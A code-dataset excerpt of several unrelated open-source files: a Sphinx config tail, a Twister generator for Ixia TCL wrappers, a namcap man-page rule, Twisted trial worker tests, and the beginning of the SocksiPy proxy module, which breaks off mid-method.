#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False | apache-2.0 |
Luxoft/Twister | lib/Ixia/generate.py | 2 | 15483 | #!/usr/bin/env python
# File: generate.py ; This file is part of Twister.
# version: 2.003
# Copyright (C) 2013 , Luxoft
# Authors:
# Adrian Toader <[email protected]>
# Andrei Costachi <[email protected]>
# Andrei Toma <[email protected]>
# Cristi Constantin <[email protected]>
# Daniel Cioata <[email protected]>
# Mihail Tudoran <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file generates Ixia Library wrapper in Python, using TCL functions from IxTclHal.
Params: - IxOS TCL lib path
- IP address of Ixia chassis
'''
from Tkinter import Tcl
from collections import OrderedDict
import re
import socket
import sys
import os
chassis_ip = '10.100.100.45'
tcl_lib_path = '/home/twister/ixos/ixia/lib/ixTcl1.0'
if len(sys.argv) < 3:
print 'Usage: python generate.py <ixos_tcl_lib_path> <chassis_ip_address>'
exit()
tcl_lib_path = sys.argv[1]
chassis_ip = sys.argv[2]
# some minimal checks on IP address
if chassis_ip.count('.') < 3:
print 'ERROR: IP address not valid !'
try:
socket.inet_aton(chassis_ip)
except socket.error:
print 'ERROR: IP address not valid !'
exit()
# check if IxOS tcl lib path exists
if tcl_lib_path[-1] == '/':
tcl_lib_path = tcl_lib_path.rstrip('/')
if not os.path.isdir(tcl_lib_path):
print 'ERROR: IxOS tcl lib path doesn\'t exists'
exit()
tcl = Tcl()
tcl.eval('package req IxTclHal')
tcl.eval('ixConnectToTclServer ' + chassis_ip)
tcl.eval('ixConnectToChassis ' + chassis_ip)
# # # # # # # #
HEAD = """
from Tkinter import Tcl
t = Tcl()
t.eval('package req IxTclHal')
true = True
false = False
yes = True
no = False
none = None
"""
TAIL = """
def ix_exec(cmd):
# This is used for executing custom TCL commands
r = t.eval(cmd)
return r
if __name__ == "__main__":
chassis_ip = '%s'
funcs = [x[0] for x in locals().items() if callable( x[1] )]
# print sorted(funcs)
print 'Found {} functions!'.format(len(funcs))
print 'Is this UNIX?', isUNIX()
print 'Connect to TCL Server:', ixConnectToTclServer(chassis_ip)
print 'Connect to Chassis', ixConnectToChassis(chassis_ip)
print 'Config chassis...'
portList = ''
chassis('get ' + chassis_ip)
py_chassis = chassis('cget -id')
print py_chassis
print 'Config card...'
py_card = 1
card('setDefault')
card('config -txFrequencyDeviation 0')
print py_card
print 'Config port...'
py_port = 1
port('setFactoryDefaults {} {} {}'.format(py_chassis, py_card, py_port))
port('config -speed 100')
port('config -duplex full')
port('config -flowControl false')
print py_port
print 'Config stat...'
stat('setDefault')
stat('config -mode statNormal')
stat('config -enableValidStats false')
stat('config -enableProtocolServerStats true')
stat('config -enableArpStats true')
stat('config -enablePosExtendedStats true')
stat('config -enableDhcpStats false')
stat('config -enableDhcpV6Stats false')
stat('config -enableEthernetOamStats false')
print 'Done.'
print 'Config flexibleTimestamp...'
flexibleTimestamp('setDefault')
flexibleTimestamp('config -type timestampBeforeCrc')
flexibleTimestamp('config -offset 23')
print 'Done.'
print 'Config filter...'
ix_filter('setDefault')
ix_filter('config -captureTriggerDA anyAddr')
ix_filter('config -captureTriggerSA anyAddr')
ix_filter('config -captureTriggerPattern anyPattern')
ix_filter('config -captureTriggerError errAnyFrame')
print 'Done.'
print 'Config filterPallette...'
filterPallette('setDefault')
filterPallette('config -DA1 "00 00 00 00 00 00"')
filterPallette('config -DAMask1 "00 00 00 00 00 00"')
filterPallette('config -DA2 "00 00 00 00 00 00"')
filterPallette('config -DAMask2 "00 00 00 00 00 00"')
filterPallette('config -SA1 "00 00 00 00 00 00"')
filterPallette('config -SAMask1 "00 00 00 00 00 00"')
filterPallette('config -SA2 "00 00 00 00 00 00"')
filterPallette('config -SAMask2 "00 00 00 00 00 00"')
filterPallette('config -pattern1 "DE ED EF FE AC CA"')
filterPallette('config -patternMask1 "00 00 00 00 00 00"')
print 'Done.'
print 'Config capture...'
capture('setDefault')
capture('config -fullAction lock')
capture('config -sliceSize 8191')
print 'Done.'
print 'Config ipAddressTable...'
ipAddressTable('setDefault')
ipAddressTable('config -defaultGateway "0.0.0.0"')
print 'Done.'
print 'Config arpServer...'
arpServer('setDefault')
arpServer('config -retries 3')
arpServer('config -mode arpGatewayOnly')
arpServer('config -rate 208333')
arpServer('config -requestRepeatCount 3')
print 'Done.'
print 'Config interfaceTable...'
interfaceTable('setDefault')
interfaceTable('config -dhcpV4RequestRate 0')
interfaceTable('config -dhcpV6RequestRate 0')
interfaceTable('config -dhcpV4MaximumOutstandingRequests 100')
interfaceTable('config -dhcpV6MaximumOutstandingRequests 100')
#interfaceTable('config -fcoeRequestRate 500')
print 'Done.'
print 'Clear All Interfaces ...'
interfaceTable('clearAllInterfaces')
print 'Done.'
print 'Config protocolServer...'
protocolServer('setDefault')
protocolServer('config -enableArpResponse true')
protocolServer('config -enablePingResponse false')
print 'Done.'
print 'Config oamPort...'
oamPort('setDefault')
oamPort('config -enable false')
oamPort('config -macAddress "00 00 AB BA DE AD"')
oamPort('config -enableLoopback false')
oamPort('config -enableLinkEvents false')
print 'Done.'
print 'Call ixWritePortsToHardware and ixCheckLinkState ...'
# lappend portList [list $chassis $card $port] # ???
ixWritePortsToHardware(portList, None)
ixCheckLinkState(portList)
print 'Done.'
#
""" % (chassis_ip)
# # # # # # # #
def tcl_convert(variable):
"""
This returns the TCL value converted into Pyton string repr.
alnum
Any Unicode alphabet or digit character.
alpha
Any Unicode alphabet character.
ascii
Any character with a value less than \u0080 (those that are in the 7-bit ascii range).
boolean
Any of the forms allowed to Tcl_GetBoolean.
In the case of boolean, true and false, if the function will return 0, then the varname will always be set to 0,
due to the varied nature of a valid boolean value.
control
Any Unicode control character.
digit
Any Unicode digit character. Note that this includes characters outside of the [0-9] range.
double
Any of the valid forms for a double in Tcl, with optional surrounding \
whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
false
Any of the forms allowed to Tcl_GetBoolean where the value is false.
graph
Any Unicode printing character, except space.
integer
Any of the valid forms for an ordinary integer in Tcl, with optional \
surrounding whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
lower
Any Unicode lower case alphabet character.
print
Any Unicode printing character, including space.
punct
Any Unicode punctuation character.
space
Any Unicode space character.
true
Any of the forms allowed to Tcl_GetBoolean where the value is true.
upper
Any upper case alphabet character in the Unicode character set.
wordchar
Any Unicode word character. That is any alphanumeric character, and \
any Unicode connector punctuation characters (e.g. underscore).
xdigit
Any hexadecimal digit character ([0-9A-Fa-f]).
"""
global tcl
types = OrderedDict([
['integer', int],
['digit', int],
['double', float],
['true', bool],
['false', bool],
['boolean', bool],
['xdigit', str],
['alnum', str],
['alpha', str],
['ascii', str],
['control', str],
['graph', str],
['lower', str],
['print', str],
['punct', str],
['space', str],
['upper', str],
['wordchar', str],
])
for tcl_type, py_type in types.iteritems():
found = tcl.eval("string is {} -strict ${}".format(tcl_type, variable))
found = int(found)
if found:
value = tcl.getvar('vDefaultArg')
value = str(value)
print 'Converting value `{}` into TCL type `{}`.'.format(value, tcl_type)
if value == 'false' or value == 'no':
return False
elif py_type == str:
return '"{}"'.format(value)
else:
return value
return '!!!'
# # # # # # # #
IX_VARS = {
'from': 'ix_from',
'for': 'ix_for',
'while': 'ix_while',
'file': 'ix_file',
'object': 'ix_object',
'range': 'ix_range',
'map': 'ix_map',
'filter': 'ix_filter',
}
def fix_tcl_var(variable):
""" replace TCL variable """
global IX_VARS
if variable in IX_VARS:
return IX_VARS[variable]
return variable
def fix_tcl_func(func):
""" change TCL function """
global IX_VARS
func = func.replace('::', '_')
if func in IX_VARS:
return IX_VARS[func]
return func
# # # # # # # #
'''
Get Ixia libray version from ixTclHal.tcl file
'''
ixos_version = ''
version_file = tcl_lib_path + '/ixTclHal.tcl'
try:
with open(version_file, 'r') as v_file:
for line in v_file:
if line.startswith('package provide IxTclHal'):
ixos_version = line.split()[-1]
break
except:
print 'ERROR: Cannot get IxOS version. Exiting !'
exit()
# # # # # # # #
'''
Generate functions.txt file from file tclIndex
'''
FUNCTIONS = []
tcl_index_file = tcl_lib_path + '/tclIndex'
try:
for line in open(tcl_index_file).readlines():
if line.startswith('set auto_index(', 0):
line = line.replace('set auto_index(','')
FUNCTIONS.append(line.split(')')[0])
except:
pass
# # # # # # # #
'''
Update functions.txt file from file ixTclSetup.tcl
'''
ix_tcl_setup = tcl_lib_path + '/ixTclSetup.tcl'
try:
file_content = open(ix_tcl_setup, 'r').read()
# get entries from ixTclHal::noArgList
no_arg_list = re.findall('set ixTclHal::noArgList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(no_arg_list[0][1].replace('\\','').split())
# get entries from ixTclHal::pointerList
pointer_list = re.findall('set ixTclHal::pointerList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(pointer_list[0][1].replace('\\','').split())
# get entries from ixTclHal::command
command_list = re.findall('set ixTclHal::commandList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(command_list[0][1].replace('\\','').split())
except:
pass
try:
with open('functions.txt', 'w') as OUTPUT:
OUTPUT.write('\n'.join(FUNCTIONS))
except:
pass
# # # # # # # #
FUNCTIONS = []
for line in open('functions.txt').readlines():
if not line.strip():
continue
if '::' in line:
continue
func_name = line.strip() # TCL Function name
tcl_args = []
tcl_args_long = []
pyc_args = []
pyc_args_long = []
tmpl = '# Function `{}` is invalid'.format(func_name) # Default string, sais the func is invalid
tcl.eval('set vDefaultArg ""')
defaultArgFound = False
defaultArgs = [] # The list of mandatory arguments
try:
# Enable TCL Function. RISK excuting the function!
try:
tcl.eval(func_name)
except:
pass
proc_args = tcl.eval('info args ' + func_name)
for arg in proc_args.split():
has_default = tcl.eval('info default %s %s vDefaultArg' % (func_name, arg))
arg_fixed = fix_tcl_var(arg)
# Args for executing
tcl_args.append(arg)
# Args for calling the TCL function
pyc_args.append(arg_fixed)
# If this argument has a default value
if int(has_default) and tcl.getvar('vDefaultArg'):
defaultArgFound = True
# Args for comment
tcl_args_long.append('%s {%s}' % (arg, str(tcl.getvar('vDefaultArg'))))
# Args for defining Python functions
pyc_args_long.append('%s=%s' % (arg_fixed, str(tcl_convert('vDefaultArg'))))
else:
tcl_args_long.append(arg)
if not defaultArgFound:
pyc_args_long.append(arg_fixed)
else:
defaultArgs.append(arg_fixed)
pyc_args_long.append('%s=None' % (arg_fixed))
# Reset variable for the next cycle
tcl.eval('set vDefaultArg ""')
leng = len(tcl_args)
tcl_args = ', '.join(tcl_args)
tcl_args_long = ' '.join(tcl_args_long)
pyc_args = ', '.join(pyc_args)
pyc_args_long = ', '.join(pyc_args_long)
except Exception, e:
print('>>> Cannot create function `{}`, exception: `{}`!\n'.format(func_name, e))
continue
if defaultArgs:
defaultArgs = '\n'.join([ ' if {0} is None: print "TCL argument ' \
' `{0}` cannot be empty!"; return False'.format(x) for x in defaultArgs ])
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l}
{def_arg}\n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng, def_arg=defaultArgs)
else:
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l} \n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng)
FUNCTIONS.append(tmpl)
#
output_file = 'TscIxPythonLib_v{}.py'.format(ixos_version)
OUTPUT = open(output_file, 'w')
OUTPUT.write(HEAD)
OUTPUT.write('\n'.join(FUNCTIONS))
OUTPUT.write(TAIL)
OUTPUT.close()
# Eof()
| apache-2.0 |
charactory/namcap | Namcap/fhsmanpages.py | 2 | 1594 | #
# namcap rules - fhsmanpages
# Copyright (C) 2008 Aaron Griffin <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import tarfile
class package:
def short_name(self):
return "fhs-manpages"
def long_name(self):
return "Verifies correct installation of man pages"
def prereq(self):
return "tar"
def analyze(self, pkginfo, tar):
gooddir = 'usr/share/man'
bad_dir = 'usr/man'
ret = [[],[],[]]
for i in tar.getmembers():
if i.name.startswith(bad_dir):
ret[0].append("Non-FHS man page (" + i.name + ") found. Use /usr/share/man instead")
elif not i.name.startswith(gooddir):
#Check everything else to see if it has a 'man' path component
for part in i.name.split(os.sep):
if part == "man":
ret[1].append("Potential non-FHS man page (" + i.name + ") found.")
return ret
def type(self):
return "tarball"
# vim: set ts=4 sw=4 noet:
| gpl-2.0 |
dparlevliet/zelenka-report-storage | server-db/twisted/trial/_dist/test/test_worker.py | 33 | 14642 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test for distributed trial worker side.
"""
import os
from cStringIO import StringIO
from zope.interface.verify import verifyObject
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import TestCase
from twisted.trial._dist.worker import (
LocalWorker, LocalWorkerAMP, LocalWorkerTransport, WorkerProtocol)
from twisted.trial._dist import managercommands, workercommands
from twisted.scripts import trial
from twisted.test.proto_helpers import StringTransport
from twisted.internet.interfaces import ITransport, IAddress
from twisted.internet.defer import fail, succeed
from twisted.internet.main import CONNECTION_DONE
from twisted.internet.error import ConnectionDone
from twisted.python.failure import Failure
from twisted.protocols.amp import AMP
class FakeAMP(AMP):
"""
A fake amp protocol.
"""
class WorkerProtocolTestCase(TestCase):
"""
Tests for L{WorkerProtocol}.
"""
def setUp(self):
"""
Set up a transport, a result stream and a protocol instance.
"""
self.serverTransport = StringTransport()
self.clientTransport = StringTransport()
self.server = WorkerProtocol()
self.server.makeConnection(self.serverTransport)
self.client = FakeAMP()
self.client.makeConnection(self.clientTransport)
def test_run(self):
"""
Calling the L{workercommands.Run} command on the client returns a
response with C{success} sets to C{True}.
"""
d = self.client.callRemote(workercommands.Run, testCase="doesntexist")
def check(result):
self.assertTrue(result['success'])
d.addCallback(check)
self.server.dataReceived(self.clientTransport.value())
self.clientTransport.clear()
self.client.dataReceived(self.serverTransport.value())
self.serverTransport.clear()
return d
def test_start(self):
"""
The C{start} command changes the current path.
"""
curdir = os.path.realpath(os.path.curdir)
self.addCleanup(os.chdir, curdir)
self.server.start('..')
self.assertNotEqual(os.path.realpath(os.path.curdir), curdir)
class LocalWorkerAMPTestCase(TestCase):
"""
Test case for distributed trial's manager-side local worker AMP protocol
"""
def setUp(self):
self.managerTransport = StringTransport()
self.managerAMP = LocalWorkerAMP()
self.managerAMP.makeConnection(self.managerTransport)
self.result = TestResult()
self.workerTransport = StringTransport()
self.worker = AMP()
self.worker.makeConnection(self.workerTransport)
config = trial.Options()
self.testName = "twisted.doesnexist"
config['tests'].append(self.testName)
self.testCase = trial._getSuite(config)._tests.pop()
self.managerAMP.run(self.testCase, self.result)
self.managerTransport.clear()
def pumpTransports(self):
"""
Sends data from C{self.workerTransport} to C{self.managerAMP}, and then
data from C{self.managerTransport} back to C{self.worker}.
"""
self.managerAMP.dataReceived(self.workerTransport.value())
self.workerTransport.clear()
self.worker.dataReceived(self.managerTransport.value())
def test_runSuccess(self):
"""
Run a test, and succeed.
"""
results = []
d = self.worker.callRemote(managercommands.AddSuccess,
testName=self.testName)
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertTrue(results)
def test_runExpectedFailure(self):
"""
Run a test, and fail expectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddExpectedFailure,
testName=self.testName, error='error',
todo='todoReason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.expectedFailures[0][0])
self.assertTrue(results)
def test_runError(self):
"""
Run a test, and encounter an error.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertTrue(results)
def test_runErrorWithFrames(self):
"""
L{LocalWorkerAMP._buildFailure} recreates the C{Failure.frames} from
the C{frames} argument passed to C{AddError}.
"""
results = []
d = self.worker.callRemote(managercommands.AddError,
testName=self.testName, error='error',
errorClass='exceptions.ValueError',
frames=["file.py", "invalid code", "3"])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.errors[0][0])
self.assertEqual(
[('file.py', 'invalid code', 3, [], [])],
self.result.errors[0][1].frames)
self.assertTrue(results)
def test_runFailure(self):
"""
Run a test, and fail.
"""
results = []
d = self.worker.callRemote(managercommands.AddFailure,
testName=self.testName, fail='fail',
failClass='exceptions.RuntimeError',
frames=[])
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.failures[0][0])
self.assertTrue(results)
def test_runSkip(self):
"""
Run a test, but skip it.
"""
results = []
d = self.worker.callRemote(managercommands.AddSkip,
testName=self.testName, reason='reason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.skips[0][0])
self.assertTrue(results)
def test_runUnexpectedSuccesses(self):
"""
Run a test, and succeed unexpectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddUnexpectedSuccess,
testName=self.testName,
todo='todo')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.unexpectedSuccesses[0][0])
self.assertTrue(results)
def test_testWrite(self):
"""
L{LocalWorkerAMP.testWrite} writes the data received to its test
stream.
"""
results = []
stream = StringIO()
self.managerAMP.setTestStream(stream)
d = self.worker.callRemote(managercommands.TestWrite,
out="Some output")
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual("Some output\n", stream.getvalue())
self.assertTrue(results)
def test_stopAfterRun(self):
"""
L{LocalWorkerAMP.run} calls C{stopTest} on its test result once the
C{Run} commands has succeeded.
"""
result = object()
stopped = []
def fakeCallRemote(command, testCase):
return succeed(result)
self.managerAMP.callRemote = fakeCallRemote
class StopTestResult(TestResult):
def stopTest(self, test):
stopped.append(test)
d = self.managerAMP.run(self.testCase, StopTestResult())
self.assertEqual([self.testCase], stopped)
return d.addCallback(self.assertIdentical, result)
class FakeAMProtocol(AMP):
"""
A fake implementation of L{AMP} for testing.
"""
id = 0
dataString = ""
def dataReceived(self, data):
self.dataString += data
def setTestStream(self, stream):
self.testStream = stream
class FakeTransport(object):
"""
A fake process transport implementation for testing.
"""
dataString = ""
calls = 0
def writeToChild(self, fd, data):
self.dataString += data
def loseConnection(self):
self.calls += 1
class LocalWorkerTestCase(TestCase):
"""
Tests for L{LocalWorker} and L{LocalWorkerTransport}.
"""
def test_childDataReceived(self):
"""
L{LocalWorker.childDataReceived} forwards the received data to linked
L{AMP} protocol if the right file descriptor, otherwise forwards to
C{ProcessProtocol.childDataReceived}.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
localWorker.childDataReceived(4, "foo")
localWorker.childDataReceived(1, "bar")
self.assertEqual("foo", localWorker._ampProtocol.dataString)
self.assertEqual("bar", localWorker._outLog.getvalue())
def test_outReceived(self):
"""
L{LocalWorker.outReceived} logs the output into its C{_outLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._outLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.outReceived(data)
self.assertEqual(data, localWorker._outLog.getvalue())
def test_errReceived(self):
"""
L{LocalWorker.errReceived} logs the errors into its C{_errLog} log
file.
"""
fakeTransport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(fakeTransport)
localWorker._errLog = StringIO()
data = "The quick brown fox jumps over the lazy dog"
localWorker.errReceived(data)
self.assertEqual(data, localWorker._errLog.getvalue())
def test_write(self):
"""
L{LocalWorkerTransport.write} forwards the written data to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = "The quick brown fox jumps over the lazy dog"
localTransport.write(data)
self.assertEqual(data, transport.dataString)
def test_writeSequence(self):
"""
L{LocalWorkerTransport.writeSequence} forwards the written data to the
given transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
data = ("The quick ", "brown fox jumps ", "over the lazy dog")
localTransport.writeSequence(data)
self.assertEqual("".join(data), transport.dataString)
def test_loseConnection(self):
"""
L{LocalWorkerTransport.loseConnection} forwards the call to the given
transport.
"""
transport = FakeTransport()
localTransport = LocalWorkerTransport(transport)
localTransport.loseConnection()
self.assertEqual(transport.calls, 1)
def test_connectionLost(self):
"""
L{LocalWorker.connectionLost} closes the log streams.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
localWorker = LocalWorker(FakeAMProtocol(), '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker._errLog = FakeStream()
localWorker.connectionLost(None)
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertEqual(localWorker._errLog.callNumber, 1)
def test_processEnded(self):
"""
L{LocalWorker.processEnded} calls C{connectionLost} on itself and on
the L{AMP} protocol.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
protocol = FakeAMProtocol()
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker.processEnded(Failure(CONNECTION_DONE))
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertIdentical(None, protocol.transport)
return self.assertFailure(localWorker.endDeferred, ConnectionDone)
def test_addresses(self):
"""
L{LocalWorkerTransport.getPeer} and L{LocalWorkerTransport.getHost}
return L{IAddress} objects.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(IAddress, localTransport.getPeer()))
self.assertTrue(verifyObject(IAddress, localTransport.getHost()))
def test_transport(self):
"""
L{LocalWorkerTransport} implements L{ITransport} to be able to be used
by L{AMP}.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(ITransport, localTransport))
def test_startError(self):
"""
L{LocalWorker} swallows the exceptions returned by the L{AMP} protocol
start method, as it generates unnecessary errors.
"""
def failCallRemote(command, directory):
return fail(RuntimeError("oops"))
transport = FakeTransport()
protocol = FakeAMProtocol()
protocol.callRemote = failCallRemote
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
self.assertEqual([], self.flushLoggedErrors(RuntimeError))
| lgpl-3.0 |
konrado0/vosqa | forum_modules/oauthauth/lib/oauth2/httplib2/socks.py | 29 | 16293 | """SocksiPy - Python SOCKS module.
Version 1.00
Copyright 2006 Dan-Haim. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of Dan Haim nor the names of his contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
This module provides a standard socket-like interface for Python
for tunneling connections through SOCKS proxies.
"""
"""
Minor modifications made by Christopher Gilbert (http://motomastyle.com/)
for use in PyLoris (http://pyloris.sourceforge.net/)
Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)
mainly to merge bug fixes found in Sourceforge
"""
import socket
import struct
import sys
if getattr(socket, 'socket', None) is None:
raise ImportError('socket.socket missing, proxy support unusable')
PROXY_TYPE_SOCKS4 = 1
PROXY_TYPE_SOCKS5 = 2
PROXY_TYPE_HTTP = 3
_defaultproxy = None
_orgsocket = socket.socket
class ProxyError(Exception): pass
class GeneralProxyError(ProxyError): pass
class Socks5AuthError(ProxyError): pass
class Socks5Error(ProxyError): pass
class Socks4Error(ProxyError): pass
class HTTPError(ProxyError): pass
_generalerrors = ("success",
"invalid data",
"not connected",
"not available",
"bad proxy type",
"bad input")
_socks5errors = ("succeeded",
"general SOCKS server failure",
"connection not allowed by ruleset",
"Network unreachable",
"Host unreachable",
"Connection refused",
"TTL expired",
"Command not supported",
"Address type not supported",
"Unknown error")
_socks5autherrors = ("succeeded",
"authentication is required",
"all offered authentication methods were rejected",
"unknown username or invalid password",
"unknown error")
_socks4errors = ("request granted",
"request rejected or failed",
"request rejected because SOCKS server cannot connect to identd on the client",
"request rejected because the client program and identd report different user-ids",
"unknown error")
def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets a default proxy which all further socksocket objects will use,
unless explicitly changed.
"""
global _defaultproxy
_defaultproxy = (proxytype, addr, port, rdns, username, password)
def wrapmodule(module):
"""wrapmodule(module)
Attempts to replace a module's socket library with a SOCKS socket. Must set
a default proxy using setdefaultproxy(...) first.
This will only work on modules that import socket directly into the namespace;
most of the Python Standard Library falls into this category.
"""
if _defaultproxy != None:
module.socket.socket = socksocket
else:
raise GeneralProxyError((4, "no proxy specified"))
class socksocket(socket.socket):
"""socksocket([family[, type[, proto]]]) -> socket object
Open a SOCKS enabled socket. The parameters are the same as
those of the standard socket init. In order for SOCKS to work,
you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
"""
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
_orgsocket.__init__(self, family, type, proto, _sock)
if _defaultproxy != None:
self.__proxy = _defaultproxy
else:
self.__proxy = (None, None, None, None, None, None)
self.__proxysockname = None
self.__proxypeername = None
def __recvall(self, count):
"""__recvall(count) -> data
Receive EXACTLY the number of bytes requested from the socket.
Blocks until the required number of bytes have been received.
"""
data = self.recv(count)
while len(data) < count:
d = self.recv(count-len(data))
if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
data = data + d
return data
def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets the proxy to be used.
